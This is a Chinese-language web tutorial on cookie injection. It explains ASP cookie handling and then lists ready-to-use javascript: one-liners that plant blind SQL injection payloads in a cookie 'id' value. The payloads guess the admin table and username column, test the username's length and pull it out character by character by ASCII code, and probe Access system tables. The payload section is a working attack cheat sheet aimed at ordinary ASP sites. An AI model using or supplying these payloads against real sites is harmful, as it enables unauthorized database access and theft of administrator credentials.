快捷搜索:   服务器  安全  linux 安全  MYSQL  dedecms
笨牛网>服务器>安全防御> > Cookies 注入详解与指令 >

Cookies 注入详解与指令

发布者: bnxb 围观 点赞:0

  什么是Cookies?Cookies是数据包,可以让网页具有记忆功能,在某台电脑上记忆一定的信息。Cookies的工作原理是,第一次由服务器端写入到客户端的系统中。以后每次访问这个网页,都是先由客户端将Cookies发送到服务器端,再由服务器端进行判断,然后再产生HTML代码返回给客户端,这是一个很重要的原理。关于服务器端和客户端的概念,请点击我写的这篇:什么是服务器端和客户端,举了2个实例。

  Cookies在ASP中的最常用的方法,请做好笔记:

  1.如何写入Cookies?

  Response.Cookies("字段名")=变量或字符串,例如:

  Response.Cookies("name2")="Dingdang"

  2.如何设置Cookies时间?

  Response.Cookies("字段名").expires=时间函数+N,例如:

  Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:

  Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。

  3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写:

  Response.Cookies("字段名")=""

  之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。

  4.如何读取Cookies?

  变量名=Request.Cookies("字段名"),例如:

  name2=Request.Cookies("name2")

  如果网页中写入这句,则会显示“Dingdang”。

  也可以这样直接读取Cookies,

  Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。

  指令:

  javascript:alert(document.cookie="id="+escape("156 and 1=1"));

  javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));

  //猜是否有admin表

  javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));

  //猜是否有username表

  javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));

  //看管理员密码是否是5位

  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));

  //第一位是否是ASC码97,相当于a

  javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));

  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));

  //第二位

  javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));

  //看系统表.

   www..com    (责任编辑  Teng)

顶(0)
踩(0)
防御搜索相关内容】[打印] [关闭]

您可能还会对下面的文章感兴趣:

相关文章

最新评论